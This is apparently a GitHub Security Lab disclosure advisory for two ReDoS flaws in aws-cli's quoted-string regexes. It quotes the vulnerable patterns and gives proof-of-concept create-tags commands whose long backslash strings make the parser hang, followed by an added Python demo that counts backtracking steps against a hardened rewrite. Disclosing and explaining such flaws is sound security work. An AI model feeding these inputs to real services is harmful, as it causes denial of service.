Coordinated Disclosure Timeline

Summary

aws-cli has two regexes with ReDoS vulnerabilities.

Project

aws-cli

Tested Version

aws-cli/1.34.32 Python/3.12.3 Linux/6.8.0-41-generic botocore/1.35.32

Details

Issue 1: ReDoS in _SINGLE_QUOTED (GHSL-2024-264)

The _SINGLE_QUOTED regex has a ReDoS vulnerability:

_SINGLE_QUOTED = _NamedRegex('singled quoted', r'\'(?:\\\\|\\\'|[^\'])*\'')

Proof of concept

The following command fails to terminate:

./venv-aws-cli/bin/aws ec2 create-tags --tags x=x,"'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\" --resources yyy

This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.

Impact

This issue may lead to a denial of service.

Issue 2: ReDoS in _DOUBLE_QUOTED (GHSL-2024-265)

The _DOUBLE_QUOTED regex has a ReDoS vulnerability:

_DOUBLE_QUOTED = _NamedRegex('double quoted', r'"(?:\\\\|\\"|[^"])*"')

Proof of concept

The following command fails to terminate:

./venv-aws-cli/bin/aws ec2 create-tags --tags x=x,'"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --resources yyy

Impact

This issue may lead to a denial of service.
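The following added example (not aws-cli code and not part of the original advisory) covers both Issue 1 and Issue 2: it models a backtracking match of the quoted-string pattern and counts the loop positions visited on an unterminated run of backslashes, where the `\\\\` branch and the non-quote character class can both consume a backslash. The function names are hypothetical, and the hardened branches are an assumed rewrite, not the project's fix: they treat every backslash as escaping the next character, so an input such as `'abc\'` that the original accepts is rejected.

```python
import re

def alternatives(quote, hardened=False):
    """Loop-body branches of the quoted-string regex, in the order they are tried."""
    q = re.escape(quote)
    if hardened:
        # Assumed rewrite: backslash always escapes the next character and the
        # character class excludes backslash, so the branches never overlap.
        parts = [r'\\.', rf'[^{q}\\]']
    else:
        # Branches from the advisory: escaped backslash, escaped quote, any non-quote.
        parts = [r'\\\\', rf'\\{q}', rf'[^{q}]']
    return [re.compile(p, re.DOTALL) for p in parts]

def full_pattern(quote, hardened=False):
    """Assemble quote(?:branches)*quote as a real compiled regex."""
    q = re.escape(quote)
    body = "|".join(a.pattern for a in alternatives(quote, hardened))
    return re.compile(f"{q}(?:{body})*{q}", re.DOTALL)

def backtrack_steps(quote, text, hardened=False):
    """Model a backtracking match at offset 0; return (matched, positions visited)."""
    alts = alternatives(quote, hardened)
    steps = 0

    def body(i):
        nonlocal steps
        steps += 1
        for alt in alts:                  # greedy: try to extend the loop first
            m = alt.match(text, i)
            if m and body(m.end()):
                return True
        return text.startswith(quote, i)  # otherwise leave the loop at the closing quote

    matched = text.startswith(quote) and body(len(quote))
    return matched, steps

def unterminated(quote, n):
    """Constructed sample input: an opening quote, n backslashes, no closing quote."""
    return quote + "\\" * n

if __name__ == "__main__":
    for quote in ("'", '"'):
        for n in (8, 16, 24):
            text = unterminated(quote, n)
            _, weak = backtrack_steps(quote, text)
            _, strong = backtrack_steps(quote, text, hardened=True)
            print(f"quote={quote} n={n:2d} advisory={weak:7d} hardened={strong:3d}")
```

The step count for the advisory branches follows a Fibonacci recurrence in the number of backslashes, which is why a few hundred of them never finish, while the non-overlapping branches visit each position once.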

Credit

These issues were discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2024-264 or GHSL-2024-265 in any communication regarding these issues.